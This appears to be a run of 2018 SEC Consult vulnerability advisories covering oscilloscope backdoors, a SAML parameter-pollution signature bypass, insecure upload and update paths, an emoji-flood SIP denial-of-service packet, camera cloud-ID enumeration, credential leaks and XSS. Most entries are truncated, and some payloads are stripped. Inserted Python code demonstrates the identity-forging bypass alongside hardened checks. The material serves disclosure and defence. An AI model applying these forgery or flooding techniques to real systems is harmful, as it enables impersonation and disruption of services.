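The attacker here recomputes the checksum for the new payload and flips those bits too; compensating changes that leave the checksum literally identical work just as well. Either way the receiver learns nothing, which is why the protocol needs a MAC or an AEAD mode rather than a stronger block cipher: the vendor's beta with AES-128 (see the timeline) only helps if it also adds authentication.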
SEC Consult SA-20181130-0 :: Multiple Vulnerabilities in Siglent Technologies SDS 1202X-E Digital Oscilloscope
SEC Consult Vulnerability Lab Security Advisory < 20181130-0 >
===
title: Multiple Vulnerabilities
product: Siglent Technologies SDS 1202X-E Digital Oscilloscope
vulnerable version: V5.1.3.13
fixed version: -
CVE number: -
impact: High
homepage: http://siglenteu.com/ https://www.siglent.eu/ https://www.siglentamerica.com/
found: 2018-08-06
by: T. Weber (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===

Vendor description:
---
"SIGLENT is an international high-tech company, concentrating on R&D, sales, production and services of measurement products. As an ISO9001:2000 International Quality Management System and ISO 14001:2004 Environmental Management System Certified company, SIGLENT is also a member of the China Electronic Instrument Industry Association and Guangdong Instrument Representative Association. [...] SIGLENT focuses on the electronic test & measurement instrument industry and sees research & development as a core competency, while keeping a strong competitive edge through technology innovation and strict quality control. Try a Siglent product. Then compare the performance and the features to any other model, any other brand. Then compare the price. We believe there is no better value anyplace."

Source: http://www.siglenteu.com/about.aspx

Business recommendation:
The identified backdoor accounts are accessible through Telnet, hence a compromise of the device via a local network attack is possible. Any malicious modification of measurement values may have serious impact on the product or service which is created or offered by using this oscilloscope. Therefore, all procedures which are executed with this device are untrustworthy.

SEC Consult recommends not to use this product within a network of a production environment until a thorough security review has been performed by security professionals and all identified issues have been resolved. The vendor was unresponsive and did not provide a patch.

Vulnerability overview/description:
---
1) Hardcoded Backdoor Accounts
Two backdoor accounts are present on the system. A Telnet service is listening on port 23 which enables an attacker to connect as root to the oscilloscope via LAN. The password hashes are hardcoded and are difficult to change for the end user because the "shadow" file is stored on a cramfs (intentionally read-only) file system.

2) Missing Authentication / Design Issue
The software "EasyScopeX" can be used from any computer in the network to configure and interact with the oscilloscope. This is possible without prior authentication, which enables everyone to change settings on the oscilloscope.

3) Unencrypted Communication
The software "EasyScopeX" communicates via unencrypted TCP packets between the client computer and the oscilloscope.

4) Outdated and Vulnerable Software Components
Multiple software components embedded in the firmware are outdated and found to be vulnerable to various publicly known security issues.

Proof of concept:
-
1) Hardcoded Backdoor Accounts
The following password hashes were dumped from "/etc/shadow" by connecting to the UART interface on the PCB:
root
siglent
(The password hashes have been removed from this advisory)

2) Missing Authentication / Design Issue
It is sufficient to install the "EasyScopeX" software and control the oscilloscope without any authentication.

3) Unencrypted Communication
The software "EasyScopeX" communicates in plaintext via various ports by using the portmapper. The default ports are "5024" and "5025".

4) Outdated and Vulnerable Software Components
Using the IoT Inspector software we found the following outdated and vulnerable components:
* BusyBox 1.20.1
* GNU glibc 2.13
* Linux Kernel 3.19.0

Vulnerable / tested versions:
-
The following device / firmware version has been tested:
* Siglent SDS1202X-E (V5.1.3.13)
It is assumed that other firmware versions are affected as well.

Vendor contact timeline:
2018-08-22: Contacting German VDE CERT for coordination support
2018-09-04: Asking for a status update from the vendor
2018-09-05: VDE CERT: no response from vendor yet
2018-09-12: US sales person from Siglent has answered, VDE CERT is sending advisory to be forwarded to engineering
2018-10-10: Asking for a status update (affected versions, etc)
2018-10-10
SEC Consult SA-20181121-0 :: Signature Bypass / Authentication Bypass in Governikus Autent SDK
An additional blog post has been published on this topic as well:
English version: https://r.sec-consult.com/governikus
German version: https://r.sec-consult.com/gov

SEC Consult Vulnerability Lab Security Advisory < 20181121-0 >
===
title: Signature Bypass / Authentication Bypass
product: Governikus Autent SDK
vulnerable version: <=3.8.1
fixed version: 3.8.1.2
CVE number: -
impact: critical
homepage: https://www.governikus.de/
found: 2018-06
by: W. Ettlinger (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===

Vendor description:
---
German original, translated to English:
"In the course of digitization, electronic identities have become indispensable. At the same time, the requirements for protection, handling with regard to legal security and the federation of electronic identities are increasing. With Governikus Autent, server and client components are available to ensure authentication through electronic identities. Governikus Autent meets all the requirements of a modern identity management solution."

Source: https://www.governikus.de/produkte-loesungen/governikus-autent-und-ausweisapp2/

Business recommendation:
During a short crash test SEC Consult identified a critical vulnerability in the Governikus Autent SDK nPA authentication code (German id card authentication). This vulnerability could allow an attacker to impersonate any German citizen on a vulnerable web application. SEC Consult recommends immediately applying the workaround described below or the patch provided by the vendor. Moreover, SEC Consult recommends web application providers to check historic log files for evidence of this attack. SEC Consult recommends conducting a thorough source code security review of the Governikus Autent components as they are integral to the security of many web applications.

Vulnerability overview/description:
---
The software component tested is used by web applications to integrate nPA authentication (authentication using the German official id document). As the last step of an authentication transaction, the web application the user authenticates against receives a string containing all relevant data about the citizen (e.g. first name, last name). As this string is signed by a trusted party (an eID server), the application can verify the authenticity of this string.

The component in the web application that is supposed to verify this signature can be tricked into accepting a string that has been modified. An attacker that has acquired a single legitimately signed string can use this to authenticate as any German citizen to any web application that trusts the eID server's signature. An attacker could acquire such a signed string by hosting a web application and tricking a victim into authenticating, by gaining access to a signed string sent to a legitimate web application (man-in-the-middle attack, access to the access log) or by authenticating against a web application using his own id document.

Proof of concept:
-
1. Signature Bypass
During the last step of the nPA transaction, the user is redirected to the SAML receiver of the web application she tried to authenticate against. The SAML response is sent as a URL parameter:
https:///?SAMLResponse==<...>==

According to the demo application, the first verification a SAML receiver is meant to do is call the method HttpRedirectUtils.checkQueryString, passing the query string (as it is returned by request.getQueryString()). If this method returns false, the signature could not be verified. This method internally deconstructs the query string into individual parameters, reconstructs the query string and then verifies the signature.

If however the query string contains multiple parameters of the same name, only the last occurrence of a parameter is built into the query string the signature is verified against. Therefore, if a query string is constructed like the following, the first SAML response is ignored during signature verification:
...?SAMLResponse==...

Afterwards, when the SAML response is processed, the application is likely to use the method ServletRequest.getParameter() to retrieve the SAML response (the demo application which is meant to show the integration of the library also does this). As per the specification of this method, the application server is supposed to return the first parameter value if multiple parameters with the same name were sent. Thus, the signature is verified against t
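The bypass described in this advisory is a parsing mismatch, not a cryptographic break: the verifier rebuilds the query string from a map in which the last SAMLResponse wins, while the application later reads the first one via getParameter(). The following added example (not the Governikus Autent SDK's code) models both behaviours side by side and shows the hardened check. An HMAC over the SAMLResponse value stands in for the eID server's signature, the key and the two "citizen" strings are constructed, and the vulnerable/hardened functions are hypothetical names that mirror the advisory's description rather than the SDK's real API.

```python
"""HTTP parameter pollution against a signed redirect, and a hardened verifier.

Added example, not the Governikus Autent SDK. An HMAC stands in for the eID
server's signature; names, key and citizen data are constructed for the demo.
"""
import hashlib
import hmac
from urllib.parse import parse_qsl, urlencode

EID_SERVER_KEY = b"constructed-eid-server-key"   # the SAML receiver trusts this signer


def sign(saml_response: str) -> str:
    """Stand-in for the eID server's signature over the response."""
    return hmac.new(EID_SERVER_KEY, saml_response.encode(), hashlib.sha256).hexdigest()


def legitimate_query(saml_response: str) -> str:
    """The query string a genuine eID server redirect would carry."""
    return urlencode({"SAMLResponse": saml_response, "Signature": sign(saml_response)})


def check_query_string_vulnerable(query: str) -> bool:
    """Models HttpRedirectUtils.checkQueryString as described: the query string is
    deconstructed into a map (last occurrence of a name wins), rebuilt and verified."""
    params = dict(parse_qsl(query, keep_blank_values=True))
    return hmac.compare_digest(params.get("Signature", ""),
                               sign(params.get("SAMLResponse", "")))


def get_parameter(query: str, name: str):
    """Models ServletRequest.getParameter(): first occurrence of a repeated name."""
    for key, value in parse_qsl(query, keep_blank_values=True):
        if key == name:
            return value
    return None


def check_query_string_hardened(query: str) -> bool:
    """Refuse any repeated parameter name, so the value that is verified is
    exactly the value the application will consume afterwards."""
    pairs = parse_qsl(query, keep_blank_values=True)
    names = [key for key, _ in pairs]
    if len(names) != len(set(names)):
        return False
    params = dict(pairs)
    return hmac.compare_digest(params.get("Signature", ""),
                               sign(params.get("SAMLResponse", "")))


def demo() -> dict:
    # One legitimately signed response the attacker obtained, e.g. by authenticating
    # with their own id document at a site they control.
    signed = "givenName=Erika;familyName=Mustermann"
    forged = "givenName=Max;familyName=Musterfrau"    # any identity the attacker wants
    # Forged value first, signed value (with its signature) appended unchanged.
    polluted = urlencode({"SAMLResponse": forged}) + "&" + legitimate_query(signed)
    return {
        "vulnerable_accepts": check_query_string_vulnerable(polluted),
        "identity_used": get_parameter(polluted, "SAMLResponse"),
        "hardened_accepts": check_query_string_hardened(polluted),
    }


if __name__ == "__main__":
    print(demo())
```

For log review, as the advisory recommends, the same criterion applies: any request to the SAML receiver whose query string carries SAMLResponse more than once is a candidate for this attack.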
SEC Consult SA-20181116-0 :: Multiple critical vulnerabilities in Miss Marple Enterprise Edition
SEC Consult Vulnerability Lab Security Advisory < 20181116-0 >
===
title: Multiple critical vulnerabilities
product: Miss Marple Enterprise Edition
vulnerable version: <2.0
fixed version: 2.0
CVE number: CVE-2018-19233, CVE-2018-19234
impact: Critical
homepage: www.comparex-group.com
found: 2018-05-29
by: Marius Schwarz (Office Munich)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===

Vendor description:
---
"As a global IT company with thirty years of experience, COMPAREX is one of the world’s leading IT service providers and no. 1 software license management company in the EMEA markets. COMPAREX develops innovative services that support management and leverage software products, leading to an overall improvement of workforce productivity. COMPAREX serves corporate customers spanning from small businesses to large international corporations as well as the public institutions supporting every customer during their digital journey towards productivity optimization. The portfolio has a solid foundation in license management, software procurement and cloud services. Substantial professional and managed services complete the portfolio to support customers with services tailored to their business demands."

Source: https://comparexusa.com/about-us/about/

Business recommendation:
The vendor provides a patch and users of this product are urged to immediately upgrade to the latest version available.

Vulnerability overview/description:
---
Application overview:
Miss Marple is an inventory software that consists of a client and a server part. The client (agent) gathers system information and uploads the results to a remote server in an encrypted ZIP file.

1) Hardcoded AES key (CVE-2018-19233)
A username and an encrypted password were identified in the Miss Marple Inventory Agent configuration file. By decompiling the binary, the encryption method was identified as AES-256 with a hardcoded key and initialization vector. The credentials are used to deploy the inventory files to a remote server.

2) Uploading arbitrary files
There are two ways an attacker can upload arbitrary files to the server.

2.1) Patching the application binary to bypass the ZIP file extension check
Using this method, it is possible to upload any file to the server, even if the credentials are unknown to the attacker! This works because every file in a specific directory gets uploaded, as long as the file has the correct file extension. This can be bypassed because the file extension is only checked on the client side and not on the server side. Patching the binary is done by replacing the extension string with the file extension of the attacker's file, e.g. ".aspx", in the MMIA.exe binary itself.

2.2) Using cURL to upload arbitrary files
If the credentials are known to the attacker, it is possible to use tools like cURL to upload arbitrary files to the remote server.

Both ways can be used by an attacker to upload a web shell to the server and execute arbitrary commands.

3) Missing update validation (CVE-2018-19234)
Besides the Miss Marple Inventory Agent, a Miss Marple Updater Service is running on all clients. This service checks for new versions on the same server. If the files are uploaded to the right directory on the server, the updater will download and execute them with the highest privileges (NT Authority\SYSTEM) without validating the binaries. This can also be used for escalating privileges on the client. By uploading a web shell using the methods described in vulnerability 2, an attacker gets sufficient write permissions to access the update directory and to place malicious files on the server. This will execute arbitrary code on all clients using Miss Marple.

Proof of concept:
-
1) Hardcoded AES key (CVE-2018-19233)
No proof of concept will be provided.

2) Uploading arbitrary files
2.1) No proof of concept will be provided. E.g. the Unicode string for ".zip" just has to be replaced with the file extension for the uploaded web shell.
2.2) Using cURL to upload arbitrary files
It is possible to upload arbitrary files using cURL and the credentials obtained in 1).

3) Missing update validation (CVE-2018-19234)
No proof of concept will be provided.

Vulnerable / tested versions:
-
The following versions have been tested and found to be vulnerable:
Miss Marple Inventory Agent / Miss Marple Updater Service 1.13

Vendor contact timeline:
2018-06-
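Issue 2.1 above is a client-side-only check: a patched MMIA.exe sends a web shell under any extension and the server stores it. The receiving side has to re-validate on its own, which is what the following added example shows; it is not COMPAREX or Miss Marple code. It re-checks the .zip extension where the attacker cannot patch it, verifies that the bytes really are a ZIP archive (a renamed shell.aspx is not), rejects traversal in both the upload name and the archive's member names, and pins the destination under an inventory directory. The directory name, size limit and sample files are constructed for the demo.

```python
"""Server-side validation for an agent upload endpoint.

Added example, not COMPAREX/Miss Marple code. Directory name, size limit and the
sample files are constructed; the checks model what the advisory says the server lacked.
"""
import io
import posixpath
import zipfile

UPLOAD_ROOT = "/srv/missmarple/inventory"   # constructed: where agent ZIPs may land
MAX_BYTES = 50 * 1024 * 1024                # constructed size limit


def safe_name(filename: str):
    """Only a bare file name is acceptable: no directories, no traversal."""
    name = filename.replace("\\", "/")
    if name in ("", ".", "..") or name != posixpath.basename(name):
        return None
    return name


def validate_upload(filename: str, data: bytes):
    """Return (accepted, reason_or_destination) for one uploaded file."""
    name = safe_name(filename)
    if name is None:
        return False, "invalid file name"
    if not name.lower().endswith(".zip"):
        return False, "extension not allowed"           # e.g. shell.aspx
    if len(data) > MAX_BYTES:
        return False, "too large"
    # The name alone proves nothing: a renamed web shell is still not a ZIP.
    # (A non-empty archive starts with the local file header PK\x03\x04.)
    if data[:4] != b"PK\x03\x04" or not zipfile.is_zipfile(io.BytesIO(data)):
        return False, "content is not a ZIP archive"
    # Member names must not escape the directory the server extracts into.
    with zipfile.ZipFile(io.BytesIO(data)) as archive:
        for member in archive.namelist():
            parts = member.replace("\\", "/").split("/")
            if member.startswith("/") or ".." in parts:
                return False, "unsafe member path: " + member
    destination = posixpath.normpath(posixpath.join(UPLOAD_ROOT, name))
    if not destination.startswith(UPLOAD_ROOT + "/"):
        return False, "destination outside upload root"
    return True, destination


def make_zip(members: dict) -> bytes:
    """Build a small in-memory ZIP for the demo (constructed input)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        for path, content in members.items():
            archive.writestr(path, content)
    return buf.getvalue()


if __name__ == "__main__":
    good = make_zip({"inventory.xml": "<inventory/>"})
    for fname, blob in [("host01.zip", good), ("shell.aspx", b"<%@ Page %>"),
                        ("shell.zip", b"<%@ Page %>"), ("../update/agent.zip", good)]:
        print(fname, validate_upload(fname, blob))
```

This closes the upload path; issue 3 (the updater executing whatever appears in the update directory as SYSTEM) additionally needs the client to verify a signature on each downloaded binary, which no amount of server-side upload filtering replaces.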
SEC Consult SA-20181114-0 :: Denial of Service in Microsoft Skype for Business
SEC Consult Vulnerability Lab Security Advisory < 20181114-0 >
===
title: Denial of Service
product: Microsoft Skype for Business 2016 / Lync 2013
vulnerable version:
Microsoft Skype for Business 2015 (Lync 2013) before v15.0.5075.1000
Skype for Business 2016 before v16.0.4756.1000
fixed version:
Microsoft Skype for Business 2015 (Lync 2013) v15.0.5075.1000
Skype for Business 2016 v16.0.4756.1000
CVE number: CVE-2018-8546
impact: Medium
homepage: https://www.skype.com/en/business/
found: 08/2018
by: Sabine Degen (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===

Vendor description:
---
"Skype for Business (formerly Microsoft Office Communicator and Microsoft Lync) is an instant messaging client used with Skype for Business Server or with Skype for Business Online (available with Microsoft Office 365). Skype for Business is enterprise software."

Source: https://en.wikipedia.org/wiki/Skype_for_Business

Business recommendation:
Assess the impact of this vulnerability on your business. The patch provided by Microsoft should be installed immediately, especially if Skype for Business is being used for external communication.

Vulnerability overview/description:
---
A large number of emojis (e.g. ~800 kittens) received in one message by the Skype for Business client freezes the program for a few seconds. This can be exploited to perform denial of service attacks against Skype for Business users and compromises the availability of the program. For example, an attacker can continuously send such messages to the chat window of a meeting room in order to freeze the program for all participants and prevent them from using the chat or seeing the video. Note that the audio and video streams are handled by a separate thread and are therefore not affected (e.g. killed); only the functions related to the graphical user interface become unusable.

Proof of concept:
-
After sending a big amount of emojis (~800 kittens) to a Skype for Business chat, the program freezes for a few seconds while rendering the chat window. Continuously sending emojis will make the GUI unusable for the user. Ongoing conference calls are not affected or interrupted.

The following SIP packet illustrates the attack.

MESSAGE sip:xxx@*redacted*;opaque=user:epid:EwWlc9DdAFGQtozR4vBibAAA;gruu SIP/2.0
Via: SIP/2.0/tls 127.0.0.1:7490
From: ;tag=82254700;epid=e67b0162bec8
To: ;tag=5c302cb624;epid=15347556e6
Max-Forwards: 70
CSeq: 12 MESSAGE
User-Agent: Purple/2.12.0 Sipe/1.23.2 (win-i386; RTC/5.0)
Call-ID: 440Eg2C92a5C4Ci0A43m5DDAt76CEb3DEAx13B0x
Route:
Content-Type: text/plain; charset=UTF-8;msgr=WAAtAE0ATQBTAC0ASQBNAC0ARgBvAHIAbQBhAHQAOgAgAEYATgA9AE0AUwAlADIAMABTAGEAbgBzACUAMgAwAFMAZQByAGkAZgA7ACAARQBGAD0AOwAgAEMATwA9ADAAOwAgAFAARgA9ADAAOwAgAFIATAA9ADAADQAKAA0ACgA
Content-Length: 4420
Authorization: TLS-DSK qop="auth", opaque="174C6224", realm="SIP Communications Service", targetname="*redacted*", crand="1126134f", cnum="29", response="*redacted*"

(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)
(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)
(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)
(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)
(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)
[...]

Vulnerable / tested versions:
-
The following versions have been identified as vulnerable; they were the latest versions available at the time of the test:
* Lync 2013 (15.0) 64-Bit, part of Microsoft Office Professional Plus 2013
* Skype for Business 2016 MSO (16.0.93) 64-Bit
Both versions were running on Windows 10 Pro.

According to the vendor, all previous versions are affected:
* Skype for Business 2015 (Lync 2013) before v15.0.5075.1000
* Skype for Business 2016 before v16.0.4756.1000

Vendor contact timeline:
2018-08-02: Vulnerability details submitted to Microsoft, MSRC Case 47060 assigned
2018-08-28: Asking for a status update
2018-08-30: Vendor: issue has been reproduced, solution to block the user provided
2018-08-31: Follow-up questions why DoS is not categorized as security issue, as the provided workaround is not effective for attacks already in progress
2018-08-31: Vendor: decided to f
SEC Consult SA-20181009-0 :: Remote Code Execution via XMeye P2P Cloud in Xiongmai IP Cameras, NVRs and DVRs incl. 3rd party OEM devices (CVE-2018-17915, CVE-2018-17917, CVE-2018-17919)
SEC Consult also published a blog post regarding the identified security issues with further background information:
Blog: https://r.sec-consult.com/xmeye

SEC Consult Vulnerability Lab Security Advisory < 20181009-0 >
===
title: Remote Code Execution via XMeye P2P Cloud
product: Xiongmai IP Cameras, NVRs and DVRs incl. 3rd party OEM devices
vulnerable version: see below
fixed version: -
CVE number: CVE-2018-17915, CVE-2018-17917, CVE-2018-17919
impact: Critical
homepage: http://www.xiongmaitech.com/en/
found: 2018-03-05
by: Stefan Viehböck (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===

Vendor description:
---
"Hangzhou Xiongmai Technology Co., Ltd concentrates on security surveillance, Video intelligent research and development. We devote ourselves to providing good products, technical services for manufacturers, wholesaler and service provider, in order to offer better experience for our customers. We are global leading providers in security video products and technology. Established from 2009, many years development, the headquarter of XM locate in Yinhu Innovation Center, Fuyang district, Hangzhou now. Total registered capital reach to 60 million. Now we owns nearly 2000 employees including a strong R&D team (more than 300 experienced engineers)."

Source: http://www.xiongmaitech.com/en/index.php/about/company/18

Business recommendation:
SEC Consult has identified highly critical vulnerabilities in Xiongmai products and the "XMeye P2P Cloud" feature, which is being used in many 3rd party OEM devices as well. The vendor does not provide proper mitigations and hence it is recommended not to use any products associated with the XMeye P2P Cloud until all of the identified security issues have been fixed and a thorough security analysis has been performed by professionals.

Vulnerability overview/description:
---
1) Predictable XMEye Cloud IDs (CVE-2018-17915)
All Xiongmai devices come with a feature called "XMeye P2P Cloud". It is a proprietary, UDP-based protocol that allows users to access their IP cameras or NVRs/DVRs via the internet. The feature is enabled by default; no setup by the user is required. The device initiates and keeps a connection to a Xiongmai cloud server. All connections between clients and the devices are established via Xiongmai cloud servers. This approach allows users to connect to devices that are behind firewalls, NAT etc.

The unique, per-device identifier is the cloud ID. It is a 16 character long hexadecimal string (e.g. f7e708f21de0fde0). Anyone who knows the device identifier and the admin credentials can establish a connection to a device using the XMEye apps (Android, iOS) or a "VMS" desktop application.

The Cloud ID may be unique, but it is not random. It is derived (at boot time) from the device MAC address using a few simple operations (see get_sn_from_mac() below). An attacker can enumerate potential MACs/cloud IDs and find valid ones, then use the weak default credentials to log in. This allows the attacker to watch the video feed, change the device configuration and possibly gain remote code execution using other vulnerabilities. The XMEye functionality allows an attacker to attack devices that are behind firewalls, NATed networks etc.

MAC addresses have a well defined structure: 3-octet OUI (Vendor) + 3-octet NIC ID. OUIs are assigned by the IEEE. Interestingly, Xiongmai does not own an OUI, but instead uses the OUIs of other companies. The following OUIs are used by Xiongmai devices (OUIs based on internet research, scanning, company names based on [1]):
001210 WideRay Corp
001211 Protechna Herbst GmbH & Co. KG
001212 PLUS Corporation
001213 Metrohm AG
001214 Koenig & Bauer AG
001215 iStor Networks, Inc.
001216 ICP Internet Communication Payment AG
001217 Cisco-Linksys, LLC
001218 ARUZE Corporation
003E0B - Not assigned

We developed a cloud ID scanner that queries the Xiongmai cloud server. The responses indicate if there is a device online that uses the given cloud ID, plus provide the IP of a Xiongmai Cloud hop server that is geographically close to the device. One query is one UDP packet. We scanned 0.02% of the devices (random choice) in each OUI range (16 million devices per range) and extrapolated the results.

OUI: 001210; IDs checked 3,365; Devices online 3; Success rate: 0.1%; extrapolated devices online: 14,957
OUI: 001211; IDs checked 3,363; Devices online 9; Success rate:
SEC Consult SA-20181001-0 :: Password disclosure vulnerability & XSS in PTC ThingWorx (CVE-2018-17216, CVE-2018-17217, CVE-2018-17218)
SEC Consult Vulnerability Lab Security Advisory < 20181001-0 >
===
title: Password disclosure vulnerability & XSS
product: PTC ThingWorx
vulnerable version: 6.5-7.4, 8.0.x, 8.1.x, 8.2.x
fixed version: see Solution section
CVE number: CVE-2018-17216, CVE-2018-17217, CVE-2018-17218
impact: critical
homepage: https://www.ptc.com
found: 2018-03-13
by: M. Tomaselli (Office Munich)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===

Vendor description:
---
"ThingWorx is more than an IoT platform; it provides the functionality, flexibility and scalability that businesses need to drive industrial innovation─including the ability to source, contextualize and synthesize data while orchestrating processes and delivering powerful web, mobile and AR experiences."
Source: https://www.ptc.com/en/thingworx8

Business recommendation:
ThingWorx allows Things to be configured to communicate with other services over several protocols (e.g. LDAP integration via a DirectoryServices Thing). In order to communicate with services that require authentication, ThingWorx provides functionality to associate credentials with a Thing.

During a brief audit it was noticed that ThingWorx Composer leaks the following sensitive data:
1) The PBKDF2WithHmac512 password hash of a user Thing
2) The AES encrypted password of several Things containing password attributes

Furthermore, the password used for encryption is hard-coded and thus identical across all installations.

Besides the above mentioned vulnerabilities, a reflected cross-site scripting vulnerability was identified in the ThingWorx SQUEAL search function.

The vendor provides a patch which should be installed immediately. It is recommended to perform further thorough security audits as the product may be affected by other potential security vulnerabilities.
Vulnerability overview/description:
---
1) Disclosure of User Password Hashes to Privileged Users (CVE-2018-17216)
ThingWorx discloses the PBKDF2WithHmac512 hashed passwords of its application users when doing exports with an administrative account. This enables an attacker to conduct offline brute-force or dictionary attacks against the obtained password hashes.

2) Disclosure of Encrypted Credentials and Use of Hard-Coded Passwords (CVE-2018-17217)
A critical information disclosure vulnerability leaks the AES encrypted passwords of services configured within ThingWorx. Due to a hard-coded master password in the SecureData class, an attacker is able to decrypt the obtained passwords, which grants access to other services. The AES encrypted password gets disclosed in the server response when a user/attacker visits a Thing that contains credentials.

3) Reflected Cross-Site Scripting (CVE-2018-17218)
The JavaScript part of the ThingWorx SQUEAL search functionality (searchExpression parameter) which is responsible for parsing the obtained JSON response fails to properly sanitize user supplied input. If the victim views attacker-prepared content (e.g. on a website or in an HTML email), an attacker is able to execute arbitrary actions in the context of the victim's session.

Proof of concept:
-
The proof of concept has been removed from this advisory.

Vulnerable / tested versions:
-
The vulnerabilities have been verified to exist in version 8.0.1-b39, which was the latest version available at the time of the test. The vendor provided further affected version information. See the Solution section for reference.
Vendor contact timeline:
2018-03-14: Contacting vendor through email
2018-03-16: Advisory sent to vendor via encrypted mail
2018-03 - 2018-09: Multiple phone calls with PTC R&D department discussing release & multi-party disclosure
2018-08-15: Vendor provided private notifications to customers to give 45 days to upgrade
2018-10-01: Coordinated release of SEC Consult advisory

Solution:
-
The best recommendation is to upgrade to the latest version of ThingWorx, version 8.3.2 (at the time of writing). In newer versions, the issue of the hard-coded password has been fixed and the SQUEAL function has been removed.

The minimum upgrade to obtain mitigations for all 3 issues depends on the version of ThingWorx in use:
For ThingWorx versions 6.5-7.4, upgrade to 7.4.14+
For ThingWorx version 8.0.x, upgrade to 8.0.12+
For ThingWorx version 8.1.x, upgrade to 8.1.7+
For ThingWorx version 8.2.x, upgrade to 8.2.4+

The vendor always recommends upgradin
SEC Consult SA-20180926-0 :: Stored Cross-Site Scripting in Progress Kendo UI Editor
SEC Consult Vulnerability Lab Security Advisory < 20180926-0 >
===
title: Stored Cross-Site Scripting
product: Progress Kendo UI Editor
vulnerable version: v2018.1.221
fixed version: none, see workaround
CVE number: CVE-2018-14037
impact: medium
homepage: https://www.progress.com/kendo-ui
found: 2018-04-23
by: M. Tomaselli (Office Munich)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===

Vendor description:
---
"The Editor allows users to create rich text content by means of a WYSIWYG interface. This HTML5 widget outputs identical HTML across all major browsers, follows accessibility standards and provides an API for content manipulation. The generated widget value is comprised of XHTML markup."
https://www.telerik.com/kendo-ui/editor

Business recommendation:
SEC Consult recommends implementing the workarounds provided by the vendor.

Vulnerability overview/description:
---
The demo application of the Kendo UI Editor, which is hosted at https://demos.telerik.com/kendo-ui/editor/api, implements a Sanitizer function which should protect from cross-site scripting. However, the implemented Sanitizer fails to catch certain payloads, which allows an attacker to execute JavaScript in the context of the editor itself.
Proof of concept:
-
The following, incomplete list of payloads can be used to trigger an alert box in the API demo application of the Kendo UI Editor: https://demos.telerik.com/kendo-ui/editor/api

After a click on the button, the setValue function on line 513 of the beautified "api.js" is called:

    var setValue = function () {
        editor.value($("#value").val());
    };

The value function is implemented in line 64383 of the beautified "kendo.all.js" file and defined as:

    value: function (html) {
        var body = this.body, editorNS = kendo.ui.editor, options = this.options, currentHtml = editorNS.Serializer.domToXhtml(body, options.serialization);
        if (html === undefined) {
            return currentHtml;
        }
        if (html == currentHtml) {
            return;
        }
        editorNS.Serializer.htmlToDom(html, body, options.deserialization);
        this.selectionRestorePoint = null;
        this.update();
        this.toolbar.refreshTools();
    },

In order to mitigate certain XSS payloads the editorNS.Serializer.htmlToDom() function is called, which can be seen in the excerpt below:

    var Serializer = {
        toEditableHtml: function (html) {
            return (html || '').replace(//g, '')
                .replace(/<(\/?)script([^>]*)>/gi, '<$1k:script$2>')
                .replace(/]*)>/gi, function (match) {
                    return match.replace(onerrorRe, '');
                })
                .replace(/(<\/?img[^>]*>)[\r\n\v\f\t ]+/gi, '$1')
                .replace(/^<(table|blockquote)/i, br + '<$1')
                .replace(/^[\s]*(|\u00a0)/i, '$1')
                .replace(/<\/(table|blockquote)>$/i, '' + br);
        },

Although certain payloads are detected and sanitized by the function, the implemented protection fails to detect the data URI payload. The payload is added unescaped to the editor DOM after several other function calls.
Vulnerable / tested versions:
-
The following version has been identified to be vulnerable:
* v2018.1.221

Vendor contact timeline:
2018-05-02: Contacting vendor through email for security contact
2018-05-02: Contact person requests to obtain advisory via unencrypted mail
2018-05-08: Advisory delivered through unencrypted email to vendor
2018-05-29: Contacting vendor for current status and informing them about the publishing date
2018-07-02: Reminded the vendor that the advisory will be published soon
2018-07-02: Multiple emails exchanged, vendor demands that customers need to issue a support ticket on this case
2018-07-03: Telling them that it is a security issue they have already known about for two months without seemingly acting upon it. Vendor: product managers have been informed and will contact us; no further info
2018-07-11: Asking vendor again for a status update & patch information
2018-07-11: Vendor: "Thank you for following up. I have sent this to the product team to take into consideration. They will be following up with you as they may need. We appreciate you following up regarding this request."
2018-07-12: Detailed answer from vendor regarding workaround
2018-07-13: Requested CVE num
Re: SEC Consult SA-20180926-0 :: Stored Cross-Site Scripting in Progress Kendo UI Editor
here with correct email subject :)

On 9/26/18 2:17 PM, SEC Consult Vulnerability Lab wrote:
> SEC Consult Vulnerability Lab Security Advisory < 20180926-0 >
> ===
> title: Stored Cross-Site Scripting
> product: Progress Kendo UI Editor
> vulnerable version: v2018.1.221
> fixed version: none, see workaround
> CVE number: CVE-2018-14037
> impact: medium
> homepage: https://www.progress.com/kendo-ui
> found: 2018-04-23
> by: M. Tomaselli (Office Munich)
> SEC Consult Vulnerability Lab
>
> An integrated part of SEC Consult
> Europe | Asia | North America
>
> https://www.sec-consult.com
>
> ===
>
> Vendor description:
> ---
> "The Editor allows users to create rich text content by means of a WYSIWYG
> interface. This HTML5 widget outputs identical HTML across all major browsers,
> follows accessibility standards and provides an API for content manipulation.
> The generated widget value is comprised of XHTML markup."
>
> https://www.telerik.com/kendo-ui/editor
>
>
> Business recommendation:
>
> SEC Consult recommends to implement the workarounds provided by the vendor.
>
>
> Vulnerability overview/description:
> ---
> The demo application of the Kendo UI Editor which is hosted at
> https://demos.telerik.com/kendo-ui/editor/api implements a Sanitizer function
> which should protect from cross site scripting. However, the implemented
> Sanitizer fails to catch certain payloads which allow an attacker to execute
> JavaScript in the context of the editor itself.
>
>
> Proof of concept:
> -
